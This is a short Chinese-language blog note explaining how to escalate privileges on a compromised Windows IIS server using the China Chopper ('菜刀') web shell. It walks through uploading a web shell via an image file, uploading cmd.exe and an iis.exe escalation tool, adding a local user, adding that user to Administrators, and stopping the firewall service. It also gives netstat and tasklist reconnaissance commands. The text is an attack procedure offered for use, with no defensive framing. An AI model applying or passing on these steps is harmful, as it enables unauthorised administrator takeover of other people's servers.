关于提权问题——菜刀

1.需要一个图片码配合，上传文件，成功后，打开菜刀，然后开始操作。
2.打开菜刀，点击对应的文件管理，我们随便打开一个文件，会出现权限不够的字眼。那么我们就可以提权了。
3.打开虚拟终端，输入whoami,
** 如果出现不允许，那么操作如下：
回到文件管理，选择一个文件夹，右键单击，上传文件，上传一个cdm.exe 和iis.exe,成功后再回到虚拟终端，输入whoami,一般就可以成功。

** 如果一切正常，那么操作如下：
输入 net user 用户名 密码/add (如果还是不行，可以返回到你刚才上传文件的那个目录。一般cd ../是返回上一级的意思，cd user 是进入该盘的user目录下。
这个时候的命令是：iis.exe “whoami” 就可以成功了)

一般如果 net user yyy 2435/add 没有成功，那么就用 iis.exe “net user yyy 2435/add”

查看当前用户的状态: net user yyy 或 iis.exe “net user yyy”
提权：net localgroup Administrators pig /add或iis6.exe “net localgroup Administrators pig /add”
查看服务：tasklist -svc
查看了端口和连接状态：netstat -ano
查看本机的端口号：netstat -a -n
其中listen 表示监听，ESTABLISHED 表示建立连接，CLOSE_WAIT表示对方主动关闭连接或者网络异常导致连接中断，TIME_WAIT表示我方主动调用close()断开连接
关闭防火墙：net stop sharedaccess

写了一半，突然发现自己是个弟弟，奉上一个网站https://www.cnblogs.com/dggsec/p/10126382.html 这里很详细。
https://www.cnblogs.com/milantgh/category/594436.html 这个网站也很厉害。多学习。